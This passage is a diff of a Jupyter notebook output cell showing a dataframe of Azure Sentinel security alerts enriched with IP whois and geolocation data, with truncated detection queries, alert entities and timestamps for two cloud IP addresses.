+       "      <td>[3.88.48.125]</td>\n",
+       "      <td>0</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>Public</td>\n",
+       "      <td>None</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>14618</td>\n",
+       "      <td>3.80.0.0/12</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2017-12-20</td>\n",
+       "      <td>AMAZON-AES, US</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>[{'cidr': '3.0.0.0/9', 'name': 'AT-88-Z', 'handle': 'NET-3-0-0-0-1', 'range': '3.0.0.0 - 3.127.2...</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>US</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>Virginia</td>\n",
+       "      <td>Ashburn</td>\n",
+       "      <td>-77.4728</td>\n",
+       "      <td>39.0481</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>...</td>\n",
+       "      <td>83</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>False</td>\n",
+       "      <td>2020-11-20 03:52:20+00:00</td>\n",
+       "      <td>2020-11-20 03:52:20+00:00</td>\n",
+       "      <td>2020-11-20 04:06:42+00:00</td>\n",
+       "      <td></td>\n",
+       "      <td>{\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"chambresdhotesbruges.fr\\\") | wh...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"chambresdhotesbruges.fr\",\\r\\n    \"HostName\": \"c...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>d1d8779d-38d7-4f06-91db-9cbc8de0176f</td>\n",
+       "      <td>soc</td>\n",
+       "      <td></td>\n",
+       "      <td>Azure Sentinel</td>\n",
+       "      <td>Microsoft Threat Intelligence Analytics</td>\n",
+       "      <td></td>\n",
+       "      <td>New</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>Unknown</td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td>ebfe31f1-bc4b-69a1-521a-84b35a681cd1</td>\n",
+       "      <td>{\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"chambresdhotesbruges.fr\\\") | wh...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"chambresdhotesbruges.fr\",\\r\\n    \"HostName\": \"c...</td>\n",
+       "      <td>[3.88.48.125]</td>\n",
+       "      <td>0</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>Public</td>\n",
+       "      <td>None</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>14618</td>\n",
+       "      <td>3.80.0.0/12</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2017-12-20</td>\n",
+       "      <td>AMAZON-AES, US</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>[{'cidr': '3.0.0.0/9', 'name': 'AT-88-Z', 'handle': 'NET-3-0-0-0-1', 'range': '3.0.0.0 - 3.127.2...</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>US</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>Virginia</td>\n",
+       "      <td>Ashburn</td>\n",
+       "      <td>-77.4728</td>\n",
+       "      <td>39.0481</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>...</td>\n",
+       "      <td>83</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>False</td>\n",
+       "      <td>2020-11-20 03:52:17+00:00</td>\n",
+       "      <td>2020-11-20 03:52:17+00:00</td>\n",
+       "      <td>2020-11-20 04:06:43+00:00</td>\n",
+       "      <td></td>\n",
+       "      <td>{\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"chambresdhotesbruges.fr\\\") | wh...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"chambresdhotesbruges.fr\",\\r\\n    \"HostName\": \"c...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>d1d8779d-38d7-4f06-91db-9cbc8de0176f</td>\n",
+       "      <td>soc</td>\n",
+       "      <td></td>\n",
+       "      <td>Azure Sentinel</td>\n",
+       "      <td>Microsoft Threat Intelligence Analytics</td>\n",
+       "      <td></td>\n",
+       "      <td>New</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>Unknown</td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td>1eb1fd38-431d-a69a-bc81-955b7e675ddf</td>\n",
+       "      <td>{\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"chambresdhotesbruges.fr\\\") | wh...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"chambresdhotesbruges.fr\",\\r\\n    \"HostName\": \"c...</td>\n",
+       "      <td>[3.88.48.125]</td>\n",
+       "      <td>0</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>Public</td>\n",
+       "      <td>None</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>14618</td>\n",
+       "      <td>3.80.0.0/12</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2017-12-20</td>\n",
+       "      <td>AMAZON-AES, US</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>[{'cidr': '3.0.0.0/9', 'name': 'AT-88-Z', 'handle': 'NET-3-0-0-0-1', 'range': '3.0.0.0 - 3.127.2...</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>US</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>Virginia</td>\n",
+       "      <td>Ashburn</td>\n",
+       "      <td>-77.4728</td>\n",
+       "      <td>39.0481</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>...</td>\n",
+       "      <td>83</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>False</td>\n",
+       "      <td>2020-11-20 03:52:17+00:00</td>\n",
+       "      <td>2020-11-20 03:52:17+00:00</td>\n",
+       "      <td>2020-11-20 04:06:45+00:00</td>\n",
+       "      <td></td>\n",
+       "      <td>{\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"chambresdhotesbruges.fr\\\") | wh...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"chambresdhotesbruges.fr\",\\r\\n    \"HostName\": \"c...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>d1d8779d-38d7-4f06-91db-9cbc8de0176f</td>\n",
+       "      <td>soc</td>\n",
+       "      <td></td>\n",
+       "      <td>Azure Sentinel</td>\n",
+       "      <td>Microsoft Threat Intelligence Analytics</td>\n",
+       "      <td></td>\n",
+       "      <td>New</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>Unknown</td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td>a79e3d8f-ce76-cba5-ea9a-00a89fc4b2a9</td>\n",
+       "      <td>{\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"chambresdhotesbruges.fr\\\") | wh...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"chambresdhotesbruges.fr\",\\r\\n    \"HostName\": \"c...</td>\n",
+       "      <td>[3.88.48.125]</td>\n",
+       "      <td>0</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>...</th>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1592</th>\n",
+       "      <td>20.55.97.123</td>\n",
+       "      <td>20.55.97.123</td>\n",
+       "      <td>Public</td>\n",
+       "      <td>None</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>8075</td>\n",
+       "      <td>20.48.0.0/12</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2017-10-18</td>\n",
+       "      <td>MICROSOFT-CORP-MSN-AS-BLOCK, US</td>\n",
+       "      <td>20.55.97.123</td>\n",
+       "      <td>[{'cidr': '20.128.0.0/16, 20.64.0.0/10, 20.40.0.0/13, 20.36.0.0/14, 20.48.0.0/12, 20.34.0.0/15, ...</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>US</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>Virginia</td>\n",
+       "      <td>Washington</td>\n",
+       "      <td>-78.1539</td>\n",
+       "      <td>38.7095</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>...</td>\n",
+       "      <td></td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>False</td>\n",
+       "      <td>2021-01-30 21:04:21.558000+00:00</td>\n",
+       "      <td>2021-02-13 21:04:21.558000+00:00</td>\n",
+       "      <td>2021-02-13 21:09:29.084000+00:00</td>\n",
+       "      <td></td>\n",
+       "      <td>{\\r\\n  \"Query\": \"// The query_now parameter represents the time (in UTC) at which the scheduled ...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"Address\": \"192.168.1.216\",\\r\\n    \"Type\": \"ip\"\\r\\n  },\\r\\n  ...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>d1d8779d-38d7-4f06-91db-9cbc8de0176f</td>\n",
+       "      <td>soc</td>\n",
+       "      <td></td>\n",
+       "      <td>Azure Sentinel</td>\n",
+       "      <td>Scheduled Alerts</td>\n",
+       "      <td></td>\n",
+       "      <td>New</td>\n",
+       "      <td></td>\n",
+       "      <td>Exfiltration</td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td>b03ba910-9e74-49d3-4454-6338d853400b</td>\n",
+       "      <td>{\\r\\n  \"Query\": \"// The query_now parameter represents the time (in UTC) at which the scheduled ...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"Address\": \"192.168.1.216\",\\r\\n    \"Type\": \"ip\"\\r\\n  },\\r\\n  ...</td>\n",
+       "      <td>[20.55.97.123]</td>\n",
+       "      <td>4</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1593</th>\n",
+       "      <td>20.55.97.123</td>\n",
+       "      <td>20.55.97.123</td>\n",
+       "      <td>Public</td>\n",
+       "      <td>None</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>8075</td>\n",
+       "      <td>20.48.0.0/12</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2017-10-18</td>\n",
+       "      <td>MICROSOFT-CORP-MSN-AS-BLOCK, US</td>\n",
+       "      <td>20.55.97.123</td>\n",
+       "      <td>[{'cidr': '20.128.0.0/16, 20.64.0.0/10, 20.40.0.0/13, 20.36.0.0/14, 20.48.0.0/12, 20.34.0.0/15, ...</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>US</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>Virginia</td>\n",
+       "      <td>Washington</td>\n",
+       "      <td>-78.1539</td>\n",
+       "      <td>38.7095</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>...</td>\n",
+       "      <td></td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>False</td>\n",
+       "      <td>2021-01-30 22:04:21.558000+00:00</td>\n",
+       "      <td>2021-02-13 22:04:21.558000+00:00</td>\n",
+       "      <td>2021-02-13 22:09:28.540000+00:00</td>\n",
+       "      <td></td>\n",
+       "      <td>{\\r\\n  \"Query\": \"// The query_now parameter represents the time (in UTC) at which the scheduled ...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"Address\": \"192.168.1.216\",\\r\\n    \"Type\": \"ip\"\\r\\n  },\\r\\n  ...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>d1d8779d-38d7-4f06-91db-9cbc8de0176f</td>\n",
+       "      <td>soc</td>\n",
+       "      <td></td>\n",
+       "      <td>Azure Sentinel</td>\n",
+       "      <td>Scheduled Alerts</td>\n",
+       "      <td></td>\n",
+       "      <td>New</td>\n",
+       "      <td></td>\n",
+       "      <td>Exfiltration</td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td>5da44cf1-5f00-b9b0-61eb-d3e5e4051478</td>\n",
+       "      <td>{\\r\\n  \"Query\": \"// The query_now parameter represents the time (in UTC) at which the scheduled ...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"Address\": \"192.168.1.216\",\\r\\n    \"Type\": \"ip\"\\r\\n  },\\r\\n  ...</td>\n",
+       "      <td>[20.55.97.123]</td>\n",
+       "      <td>4</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1594</th>\n",
+       "      <td>20.55.97.123</td>\n",
+       "      <td>20.55.97.123</td>\n",
+       "      <td>Public</td>\n",
+       "      <td>None</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>8075</td>\n",
+       "      <td>20.48.0.0/12</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2017-10-18</td>\n",
+       "      <td>MICROSOFT-CORP-MSN-AS-BLOCK, US</td>\n",
+       "      <td>20.55.97.123</td>\n",
+       "      <td>[{'cidr': '20.128.0.0/16, 20.64.0.0/10, 20.40.0.0/13, 20.36.0.0/14, 20.48.0.0/12, 20.34.0.0/15, ...</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>US</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>Virginia</td>\n",
+       "      <td>Washington</td>\n",
+       "      <td>-78.1539</td>\n",
+       "      <td>38.7095</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>...</td>\n",
+       "      <td></td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>False</td>\n",
+       "      <td>2021-01-31 02:04:21.558000+00:00</td>\n",
+       "      <td>2021-02-14 02:04:21.558000+00:00</td>\n",
+       "      <td>2021-02-14 02:09:28.799000+00:00</td>\n",
+       "      <td></td>\n",
+       "      <td>{\\r\\n  \"Query\": \"// The query_now parameter represents the time (in UTC) at which the scheduled ...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"Address\": \"192.168.1.216\",\\r\\n    \"Type\": \"ip\"\\r\\n  },\\r\\n  ...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>d1d8779d-38d7-4f06-91db-9cbc8de0176f</td>\n",
+       "      <td>soc</td>\n",
+       "      <td></td>\n",
+       "      <td>Azure Sentinel</td>\n",
+       "      <td>Scheduled Alerts</td>\n",
+       "      <td></td>\n",
+       "      <td>New</td>\n",
+       "      <td></td>\n",
+       "      <td>Exfiltration</td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td>0f0aa0e7-f56a-7f90-c042-a082e33c7bc6</td>\n",
+       "      <td>{\\r\\n  \"Query\": \"// The query_now parameter represents the time (in UTC) at which the scheduled ...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"Address\": \"192.168.1.216\",\\r\\n    \"Type\": \"ip\"\\r\\n  },\\r\\n  ...</td>\n",
+       "      <td>[20.55.97.123]</td>\n",
+       "      <td>4</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1595</th>\n",
+       "      <td>20.55.97.123</td>\n",
+       "      <td>20.55.97.123</td>\n",
+       "      <td>Public</td>\n",
+       "      <td>None</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>8075</td>\n",
+       "      <td>20.48.0.0/12</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2017-10-18</td>\n",
+       "      <td>MICROSOFT-CORP-MSN-AS-BLOCK, US</td>\n",
+       "      <td>20.55.97.123</td>\n",
+       "      <td>[{'cidr': '20.128.0.0/16, 20.64.0.0/10, 20.40.0.0/13, 20.36.0.0/14, 20.48.0.0/12, 20.34.0.0/15, ...</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>US</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>Virginia</td>\n",
+       "      <td>Washington</td>\n",
+       "      <td>-78.1539</td>\n",
+       "      <td>38.7095</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>...</td>\n",
+       "      <td></td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>False</td>\n",
+       "      <td>2021-01-31 04:04:21.558000+00:00</td>\n",
+       "      <td>2021-02-14 04:04:21.558000+00:00</td>\n",
+       "      <td>2021-02-14 04:09:28.953000+00:00</td>\n",
+       "      <td></td>\n",
+       "      <td>{\\r\\n  \"Query\": \"// The query_now parameter represents the time (in UTC) at which the scheduled ...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"Address\": \"192.168.1.216\",\\r\\n    \"Type\": \"ip\"\\r\\n  },\\r\\n  ...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>d1d8779d-38d7-4f06-91db-9cbc8de0176f</td>\n",
+       "      <td>soc</td>\n",
+       "      <td></td>\n",
+       "      <td>Azure Sentinel</td>\n",
+       "      <td>Scheduled Alerts</td>\n",
+       "      <td></td>\n",
+       "      <td>New</td>\n",
+       "      <td></td>\n",
+       "      <td>Exfiltration</td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td>44df015d-0414-88db-e149-18c9c6f37764</td>\n",
+       "      <td>{\\r\\n  \"Query\": \"// The query_now parameter represents the time (in UTC) at which the scheduled ...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"Address\": \"192.168.1.216\",\\r\\n    \"Type\": \"ip\"\\r\\n  },\\r\\n  ...</td>\n",
+       "      <td>[20.55.97.123]</td>\n",
+       "      <td>4</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1596</th>\n",
+       "      <td>20.55.97.123</td>\n",
+       "      <td>20.55.97.123</td>\n",
+       "      <td>Public</td>\n",
+       "      <td>None</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>8075</td>\n",
+       "      <td>20.48.0.0/12</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2017-10-18</td>\n",
+       "      <td>MICROSOFT-CORP-MSN-AS-BLOCK, US</td>\n",
+       "      <td>20.55.97.123</td>\n",
+       "      <td>[{'cidr': '20.128.0.0/16, 20.64.0.0/10, 20.40.0.0/13, 20.36.0.0/14, 20.48.0.0/12, 20.34.0.0/15, ...</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>US</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>Virginia</td>\n",
+       "      <td>Washington</td>\n",
+       "      <td>-78.1539</td>\n",
+       "      <td>38.7095</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>...</td>\n",
+       "      <td></td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>False</td>\n",
+       "      <td>2021-02-09 17:25:20+00:00</td>\n",
+       "      <td>2021-02-10 01:04:24+00:00</td>\n",
+       "      <td>2021-02-10 01:09:28+00:00</td>\n",
+       "      <td></td>\n",
+       "      <td>{\\r\\n  \"Query\": \"// The query_now parameter represents the time (in UTC) at which the scheduled ...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"Url\": \"https://bit.ly/3htG84T\",\\r\\n    \"Type\": \"url\"\\r\\n  },...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>d1d8779d-38d7-4f06-91db-9cbc8de0176f</td>\n",
+       "      <td>soc</td>\n",
+       "      <td></td>\n",
+       "      <td>Azure Sentinel</td>\n",
+       "      <td>Scheduled Alerts</td>\n",
+       "      <td></td>\n",
+       "      <td>New</td>\n",
+       "      <td></td>\n",
+       "      <td>Unknown</td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td>9efcecb6-1a26-eb48-81ed-f6268080ac60</td>\n",
+       "      <td>{\\r\\n  \"Query\": \"// The query_now parameter represents the time (in UTC) at which the scheduled ...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"Url\": \"https://bit.ly/3htG84T\",\\r\\n    \"Type\": \"url\"\\r\\n  },...</td>\n",
+       "      <td>[20.55.97.123]</td>\n",
+       "      <td>4</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "<p>1597 rows × 64 columns</p>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                IP            ip  result   nir asn_registry    asn  \\\n",
+       "0      3.88.48.125   3.88.48.125  Public  None         arin  14618   \n",
+       "1      3.88.48.125   3.88.48.125  Public  None         arin  14618   \n",
+       "2      3.88.48.125   3.88.48.125  Public  None         arin  14618   \n",
+       "3      3.88.48.125   3.88.48.125  Public  None         arin  14618   \n",
+       "4      3.88.48.125   3.88.48.125  Public  None         arin  14618   \n",
+       "...            ...           ...     ...   ...          ...    ...   \n",
+       "1592  20.55.97.123  20.55.97.123  Public  None         arin   8075   \n",
+       "1593  20.55.97.123  20.55.97.123  Public  None         arin   8075   \n",
+       "1594  20.55.97.123  20.55.97.123  Public  None         arin   8075   \n",
+       "1595  20.55.97.123  20.55.97.123  Public  None         arin   8075   \n",
+       "1596  20.55.97.123  20.55.97.123  Public  None         arin   8075   \n",
+       "\n",
+       "          asn_cidr asn_country_code    asn_date  \\\n",
+       "0      3.80.0.0/12               US  2017-12-20   \n",
+       "1      3.80.0.0/12               US  2017-12-20   \n",
+       "2      3.80.0.0/12               US  2017-12-20   \n",
+       "3      3.80.0.0/12               US  2017-12-20   \n",
+       "4      3.80.0.0/12               US  2017-12-20   \n",
+       "...            ...              ...         ...   \n",
+       "1592  20.48.0.0/12               US  2017-10-18   \n",
+       "1593  20.48.0.0/12               US  2017-10-18   \n",
+       "1594  20.48.0.0/12               US  2017-10-18   \n",
+       "1595  20.48.0.0/12               US  2017-10-18   \n",
+       "1596  20.48.0.0/12               US  2017-10-18   \n",
+       "\n",
+       "                      asn_description         query  \\\n",
+       "0                      AMAZON-AES, US   3.88.48.125   \n",
+       "1                      AMAZON-AES, US   3.88.48.125   \n",
+       "2                      AMAZON-AES, US   3.88.48.125   \n",
+       "3                      AMAZON-AES, US   3.88.48.125   \n",
+       "4                      AMAZON-AES, US   3.88.48.125   \n",
+       "...                               ...           ...   \n",
+       "1592  MICROSOFT-CORP-MSN-AS-BLOCK, US  20.55.97.123   \n",
+       "1593  MICROSOFT-CORP-MSN-AS-BLOCK, US  20.55.97.123   \n",
+       "1594  MICROSOFT-CORP-MSN-AS-BLOCK, US  20.55.97.123   \n",
+       "1595  MICROSOFT-CORP-MSN-AS-BLOCK, US  20.55.97.123   \n",
+       "1596  MICROSOFT-CORP-MSN-AS-BLOCK, US  20.55.97.123   \n",
+       "\n",
+       "                                                                                                     nets  \\\n",
+       "0     [{'cidr': '3.0.0.0/9', 'name': 'AT-88-Z', 'handle': 'NET-3-0-0-0-1', 'range': '3.0.0.0 - 3.127.2...   \n",
+       "1     [{'cidr': '3.0.0.0/9', 'name': 'AT-88-Z', 'handle': 'NET-3-0-0-0-1', 'range': '3.0.0.0 - 3.127.2...   \n",
+       "2     [{'cidr': '3.0.0.0/9', 'name': 'AT-88-Z', 'handle': 'NET-3-0-0-0-1', 'range': '3.0.0.0 - 3.127.2...   \n",
+       "3     [{'cidr': '3.0.0.0/9', 'name': 'AT-88-Z', 'handle': 'NET-3-0-0-0-1', 'range': '3.0.0.0 - 3.127.2...   \n",
+       "4     [{'cidr': '3.0.0.0/9', 'name': 'AT-88-Z', 'handle': 'NET-3-0-0-0-1', 'range': '3.0.0.0 - 3.127.2...   \n",
+       "...                                                                                                   ...   \n",
+       "1592  [{'cidr': '20.128.0.0/16, 20.64.0.0/10, 20.40.0.0/13, 20.36.0.0/14, 20.48.0.0/12, 20.34.0.0/15, ...   \n",
+       "1593  [{'cidr': '20.128.0.0/16, 20.64.0.0/10, 20.40.0.0/13, 20.36.0.0/14, 20.48.0.0/12, 20.34.0.0/15, ...   \n",
+       "1594  [{'cidr': '20.128.0.0/16, 20.64.0.0/10, 20.40.0.0/13, 20.36.0.0/14, 20.48.0.0/12, 20.34.0.0/15, ...   \n",
+       "1595  [{'cidr': '20.128.0.0/16, 20.64.0.0/10, 20.40.0.0/13, 20.36.0.0/14, 20.48.0.0/12, 20.34.0.0/15, ...   \n",
+       "1596  [{'cidr': '20.128.0.0/16, 20.64.0.0/10, 20.40.0.0/13, 20.36.0.0/14, 20.48.0.0/12, 20.34.0.0/15, ...   \n",
+       "\n",
+       "       raw referral raw_referral CountryCode    CountryName     State  \\\n",
+       "0     None     None         None          US  United States  Virginia   \n",
+       "1     None     None         None          US  United States  Virginia   \n",
+       "2     None     None         None          US  United States  Virginia   \n",
+       "3     None     None         None          US  United States  Virginia   \n",
+       "4     None     None         None          US  United States  Virginia   \n",
+       "...    ...      ...          ...         ...            ...       ...   \n",
+       "1592  None     None         None          US  United States  Virginia   \n",
+       "1593  None     None         None          US  United States  Virginia   \n",
+       "1594  None     None         None          US  United States  Virginia   \n",
+       "1595  None     None         None          US  United States  Virginia   \n",
+       "1596  None     None         None          US  United States  Virginia   \n",
+       "\n",
+       "            City  Longitude  Latitude   Asn edges       Type_x AdditionalData  \\\n",
+       "0        Ashburn   -77.4728   39.0481  None    {}  geolocation             {}   \n",
+       "1        Ashburn   -77.4728   39.0481  None    {}  geolocation             {}   \n",
+       "2        Ashburn   -77.4728   39.0481  None    {}  geolocation             {}   \n",
+       "3        Ashburn   -77.4728   39.0481  None    {}  geolocation             {}   \n",
+       "4        Ashburn   -77.4728   39.0481  None    {}  geolocation             {}   \n",
+       "...          ...        ...       ...   ...   ...          ...            ...   \n",
+       "1592  Washington   -78.1539   38.7095  None    {}  geolocation             {}   \n",
+       "1593  Washington   -78.1539   38.7095  None    {}  geolocation             {}   \n",
+       "1594  Washington   -78.1539   38.7095  None    {}  geolocation             {}   \n",
+       "1595  Washington   -78.1539   38.7095  None    {}  geolocation             {}   \n",
+       "1596  Washington   -78.1539   38.7095  None    {}  geolocation             {}   \n",
+       "\n",
+       "      ... ConfidenceLevel ConfidenceScore IsIncident  \\\n",
+       "0     ...              83             NaN      False   \n",
+       "1     ...              83             NaN      False   \n",
+       "2     ...              83             NaN      False   \n",
+       "3     ...              83             NaN      False   \n",
+       "4     ...              83             NaN      False   \n",
+       "...   ...             ...             ...        ...   \n",
+       "1592  ...                             NaN      False   \n",
+       "1593  ...                             NaN      False   \n",
+       "1594  ...                             NaN      False   \n",
+       "1595  ...                             NaN      False   \n",
+       "1596  ...                             NaN      False   \n",
+       "\n",
+       "                         StartTimeUtc                       EndTimeUtc  \\\n",
+       "0           2020-11-20 03:52:17+00:00        2020-11-20 03:52:17+00:00   \n",
+       "1           2020-11-20 03:52:17+00:00        2020-11-20 03:52:17+00:00   \n",
+       "2           2020-11-20 03:52:20+00:00        2020-11-20 03:52:20+00:00   \n",
